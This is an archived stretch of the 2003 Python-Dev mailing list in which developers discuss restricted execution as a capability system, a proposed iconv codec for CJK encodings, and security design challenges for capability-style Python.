Date: Tue, 01 Apr 2003 10:50:59 +1200 (NZST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <200303311944.h2VJhsA16638@odiug.zope.com>
Message-ID: <200303312250.h2VMox816033@oma.cosc.canterbury.ac.nz>

> But that's not how rexec works.

It seems to me that the restricted execution mechanism (is there a
shorter term for this? calling it rexec is a misnomer, as has been
pointed out -- let's call it the REM for now) really is a kind of
capability system.

The REM works by closing off a bunch of loopholes and then controlling
which builtins a piece of code has access to.  That code can then pass
them on to other code or withhold them. Sounds a lot like
capabilities, doesn't it?

So the hypothesised "capability python" would be rather like having
REM permanently in effect...

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From martin@v.loewis.de  Mon Mar 31 23:11:16 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 01 Apr 2003 01:11:16 +0200
Subject: [Python-Dev] iconv codec
In-Reply-To: <200303312210.h2VMAba24516@odiug.zope.com>
References: <3E87F17A.3080602@lemburg.com> <20030331080417.GA52581@fallin.lv>
 <200303311221.h2VCL4Y03446@pcp02138704pcs.reston01.va.comcast.net>
 <m3el4nusbl.fsf@mira.informatik.hu-berlin.de>
 <200303312210.h2VMAba24516@odiug.zope.com>
Message-ID: <m3d6k7t9m3.fsf@mira.informatik.hu-berlin.de>

Guido van Rossum <guido@python.org> writes:

> But given that it's only got a small audience, a 3rd party module
> would satisfy the need just as well, right?

The audience is actually quite large: any call to <unicodestr>.encode
could invoke this codec, if Python does not provide a builtin codec.

This includes, in particular, all CJK codecs. 

Together with a platform-specific codec wrapper for Windows and OS X,
the need to package Python-specific CJK codecs (with the size and
maintenance issues that come with them) might vanish.

Regards,
Martin


From ping@zesty.ca  Mon Mar 31 23:15:09 2003
From: ping@zesty.ca (Ka-Ping Yee)
Date: Mon, 31 Mar 2003 17:15:09 -0600 (CST)
Subject: [Python-Dev] Capabilities
In-Reply-To: <3E8768BE.8010603@prescod.net>
Message-ID: <Pine.LNX.4.33.0303302001350.326-100000@server1.lfw.org>

On Sun, 30 Mar 2003, Paul Prescod wrote:
> I'm not clear (because I've been following the thread with half my
> brain, over quite a few days) whether you are making or have made some
> specific proposal. I guess you are proposing a restricted mode that
> would make this example actually secure as opposed to almost secure. Are
> you also proposing any changes to the syntax?

Not yet.  Although it's certainly tempting to propose syntax changes,
it makes more sense to really understand what we want first.  We can't
know that until we've actually tried programming in the capability style
in Python.  That's why i want to explore the possibilities and try these
exercises -- it will help us discover the shortest path from here to there.

> Also, is restricted mode an interpreter mode or is it scoped by module?

Whether restricted mode is activated depends on the __builtins__ of the
current namespace.  So the short answer is "by module".

> Yes, but why workaround rather than fix? Is there a deep reason Python
> objects can't write to intermediate namespaces?

No.  There's just no syntax for it yet.  But let's figure out what we
can get away with first.

> > It would be cool if you could suggest little "security challenges"
> > to work through.  Given specific scenarios requiring things like
> > mutability or friend classes, i think trying to implement them in
> > this style could be very instructive.
>
> Unfortunately, most of the examples I can come up with seem to be hacks,
> workarounds and optimizations. It isn't surprising that sometimes you
> lose some efficiency or simplicity when working in a secure system.

Hmm, i'm not sure you understood what i meant.  The code example i posted
is a solution to the design challenge: "provide read-only access to a
directory and its subdirectories, but no access to the rest of the filesystem".
I'm looking for other security design challenges to tackle in Python.
Once enough of them have been tried, we'll have a better understanding of
what Python would need to do to make secure programming easier.


-- ?!ng